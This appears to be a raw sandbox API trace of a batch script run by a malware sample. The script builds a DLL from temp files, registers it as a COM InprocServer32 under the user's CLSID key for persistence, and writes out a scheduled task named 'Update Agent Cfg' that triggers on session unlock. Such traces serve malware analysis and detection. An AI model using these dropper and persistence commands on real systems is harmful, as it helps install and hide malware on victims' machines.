[0375.687] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.687] SetFilePointer (in: hFile=0x5c, lDistanceToMove=61, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3d
[0375.687] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="SETLOCAL\r\n", cbMultiByte=10, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="SETLOCAL\r\n 4D5A50 \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\MMM.TMP\"") returned 10
[0375.687] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.687] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3d
[0375.687] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.687] GetFileType (hFile=0x5c) returned 0x1
[0375.688] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3d
[0375.688] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.688] SetFilePointer (in: hFile=0x5c, lDistanceToMove=119, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x77
[0375.688] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="MD %LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\r\n", cbMultiByte=58, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="MD %LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\r\nM.TMP\"") returned 58
[0375.688] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.688] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x77
[0375.688] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.688] GetFileType (hFile=0x5c) returned 0x1
[0375.688] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x77
[0375.689] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.689] SetFilePointer (in: hFile=0x5c, lDistanceToMove=228, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe4
[0375.689] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="COPY /B \"%TEMP%\\MMM.TMP\"+\"%TEMP%\\TTT.TMP\" %LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL \r\n", cbMultiByte=109, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="COPY /B \"%TEMP%\\MMM.TMP\"+\"%TEMP%\\TTT.TMP\" %LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL \r\n") returned 109
[0375.689] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.689] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe4
[0375.689] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.689] GetFileType (hFile=0x5c) returned 0x1
[0375.689] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe4
[0375.689] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.690] SetFilePointer (in: hFile=0x5c, lDistanceToMove=416, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a0
[0375.690] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="reg add HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{A78ED123-AB77-406B-9999-2A5D9D2F7FB7}\\InprocServer32\\ /t REG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n", cbMultiByte=188, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="reg add HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{A78ED123-AB77-406B-9999-2A5D9D2F7FB7}\\InprocServer32\\ /t REG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 188
[0375.690] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.690] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a0
[0375.690] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.690] GetFileType (hFile=0x5c) returned 0x1
[0375.690] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a0
[0375.690] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.690] SetFilePointer (in: hFile=0x5c, lDistanceToMove=481, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e1
[0375.690] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ > %temp%\\a.xml\r\n", cbMultiByte=65, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ > %temp%\\a.xml\r\n06B-9999-2A5D9D2F7FB7}\\InprocServer32\\ /t REG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 65
[0375.691] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.691] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e1
[0375.691] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.692] GetFileType (hFile=0x5c) returned 0x1
[0375.692] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e1
[0375.692] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.693] SetFilePointer (in: hFile=0x5c, lDistanceToMove=590, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x24e
[0375.693] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=109, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 109
[0375.693] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.693] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x24e
[0375.693] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.693] GetFileType (hFile=0x5c) returned 0x1
[0375.693] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x24e
[0375.693] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.693] SetFilePointer (in: hFile=0x5c, lDistanceToMove=633, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x279
[0375.694] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=43, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\nchemas.microsoft.com/windows/2004/02/mit/task\"^> >> %temp%\\a.xml\r\n") returned 43
[0375.694] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.694] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x279
[0375.694] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.694] GetFileType (hFile=0x5c) returned 0x1
[0375.694] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x279
[0375.694] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.694] SetFilePointer (in: hFile=0x5c, lDistanceToMove=701, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2bd
[0375.694] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^2020-06-18T10:13:32.9293139^ >> %temp%\\a.xml\r\n", cbMultiByte=68, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^2020-06-18T10:13:32.9293139^ >> %temp%\\a.xml\r\nows/2004/02/mit/task\"^> >> %temp%\\a.xml\r\n") returned 68
[0375.695] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.695] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2bd
[0375.695] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.695] GetFileType (hFile=0x5c) returned 0x1
[0375.695] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2bd
[0375.695] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.695] SetFilePointer (in: hFile=0x5c, lDistanceToMove=771, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x303
[0375.696] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^Update Agent Cfg^ >> %temp%\\a.xml\r\n", cbMultiByte=70, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^Update Agent Cfg^ >> %temp%\\a.xml\r\ns/2004/02/mit/task\"^> >> %temp%\\a.xml\r\n") returned 70
[0375.696] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.696] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x303
[0375.696] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.696] GetFileType (hFile=0x5c) returned 0x1
[0375.696] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x303
[0375.696] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.696] SetFilePointer (in: hFile=0x5c, lDistanceToMove=828, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x33c
[0375.696] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^\\Update_AgentConfig^ >> %temp%\\a.xml\r\n", cbMultiByte=57, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^\\Update_AgentConfig^ >> %temp%\\a.xml\r\ntemp%\\a.xml\r\n") returned 57
[0375.696] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.697] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x33c
[0375.697] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.697] GetFileType (hFile=0x5c) returned 0x1
[0375.697] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x33c
[0375.697] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.697] SetFilePointer (in: hFile=0x5c, lDistanceToMove=872, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x368
[0375.697] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=44, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\ntemp%\\a.xml\r\n") returned 44
[0375.697] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.697] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x368
[0375.698] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.698] GetFileType (hFile=0x5c) returned 0x1
[0375.698] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x368
[0375.698] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.698] SetFilePointer (in: hFile=0x5c, lDistanceToMove=907, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x38b
[0375.698] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=35, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\n%\\a.xml\r\n") returned 35
[0375.698] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.698] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x38b
[0375.698] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.698] GetFileType (hFile=0x5c) returned 0x1
[0375.698] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x38b
[0375.699] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.699] SetFilePointer (in: hFile=0x5c, lDistanceToMove=946, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3b2
[0375.699] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=39, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\nxml\r\n") returned 39
[0375.699] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.699] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3b2
[0375.699] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.699] GetFileType (hFile=0x5c) returned 0x1
[0375.699] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3b2
[0375.700] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.700] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3e8
[0375.700] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^%USERNAME%^ >> %temp%\\a.xml\r\n", cbMultiByte=54, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^%USERNAME%^ >> %temp%\\a.xml\r\nl\r\n") returned 54
[0375.700] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.700] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3e8
[0375.700] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.700] GetFileType (hFile=0x5c) returned 0x1
[0375.700] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3e8
[0375.700] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.701] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1041, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x411
[0375.701] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml \r\n", cbMultiByte=41, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml \r\ntemp%\\a.xml\r\n") returned 41
[0375.701] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.701] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x411
[0375.701] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.701] GetFileType (hFile=0x5c) returned 0x1
[0375.701] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x411
[0375.701] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.701] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1090, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x442
[0375.701] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml \r\n", cbMultiByte=49, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml \r\nxml\r\n") returned 49
[0375.702] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.702] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x442
[0375.702] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.702] GetFileType (hFile=0x5c) returned 0x1
[0375.702] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x442
[0375.702] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.702] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x477
[0375.702] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml \r\n", cbMultiByte=53, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml \r\n\n") returned 53
[0375.702] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.703] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x477
[0375.703] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.703] GetFileType (hFile=0x5c) returned 0x1
[0375.703] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x477
[0375.703] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.703] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1194, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4aa
[0375.703] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^true^ >> %temp%\\a.xml \r\n", cbMultiByte=51, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^true^ >> %temp%\\a.xml \r\n\r\n") returned 51
[0375.703] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.703] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4aa
[0375.704] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.704] GetFileType (hFile=0x5c) returned 0x1
[0375.704] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4aa
[0375.704] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.704] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1262, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4ee
[0375.704] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^SessionUnlock^ >> %temp%\\a.xml \r\n", cbMultiByte=68, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^SessionUnlock^ >> %temp%\\a.xml \r\n\r\n") returned 68
[0375.704] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.704] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4ee
[0375.704] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.704] GetFileType (hFile=0x5c) returned 0x1
[0375.705] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4ee
[0375.705] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.705] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1316, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x524
[0375.705] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^%USERNAME%^ >> %temp%\\a.xml\r\n", cbMultiByte=54, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^%USERNAME%^ >> %temp%\\a.xml\r\ntemp%\\a.xml \r\n") returned 54
[0375.705] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.705] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x524
[0375.705] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.705] GetFileType (hFile=0x5c) returned 0x1
[0375.705] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x524
[0375.706] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.706] SetFilePointer (in: hFile=0x5c, lDistanceToMove=1369, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x559
[0375.706] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=53, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\n\n") returned 53
[0375.706] _get_osfhandle (_FileHandle=3) returned 0x5c
